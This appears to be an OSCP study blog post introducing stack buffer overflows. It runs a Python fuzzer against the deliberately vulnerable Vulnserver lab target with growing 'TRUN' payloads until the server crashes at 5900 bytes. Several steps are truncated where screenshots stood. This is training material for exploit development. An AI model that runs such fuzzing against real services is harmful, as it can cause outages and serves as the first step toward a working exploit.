Introduction to Buffer Overflows

Anatomy of Memory

OSCP Learning Notes - Buffer Overflows(1)_Kali Linux

Anatomy of the Stack

OSCP Learning Notes - Buffer Overflows(1)_python_02


Tools: Vulnserver -

           Immunity Debuger -

Vulnserver Test

1. Open the vulnserver program on windows os.

OSCP Learning Notes - Buffer Overflows(1)_linux_03

2. Connect to the vulnserver from Kali Linux.

nc -nv 10.0.0.XX 9999

OSCP Learning Notes - Buffer Overflows(1)_Kali Linux_04

OSCP Learning Notes - Buffer Overflows(1)_linux_05


3.Write the Python fuzzer test script on Kali Linux

 1 #!/usr/bin/python
 2 import socket
 3 import sys
 5 buffer=["A"]
 6 counter=100
 7 while len(buffer) <= 30:
 8     buffer.append("A"*counter)
 9     counter=counter+200
11 for string in buffer:
12     print "Fuzzing vulnserver with %s bytes" % len(string)
13     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
14     connect=s.connect(('10.0.0.XX',9999))
15     s.send('TRUN /.:/' + string)
16     s.close()

Grant the rights to the script file and execute the

chmod 777

OSCP Learning Notes - Buffer Overflows(1)_OSCP_06

The vulnserver crashed with 5900 bytes.

Immunity Debuger

OSCP Learning Notes - Buffer Overflows(1)_linux_07

 GUI Screenshoot

OSCP Learning Notes - Buffer Overflows(1)_linux_08


Open or attach the vulnserver program.

OSCP Learning Notes - Buffer Overflows(1)_OSCP_09


Perform the on Kali Linux.



OSCP Learning Notes - Buffer Overflows(1)_github_10

The vulnserver crashed finally.


相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。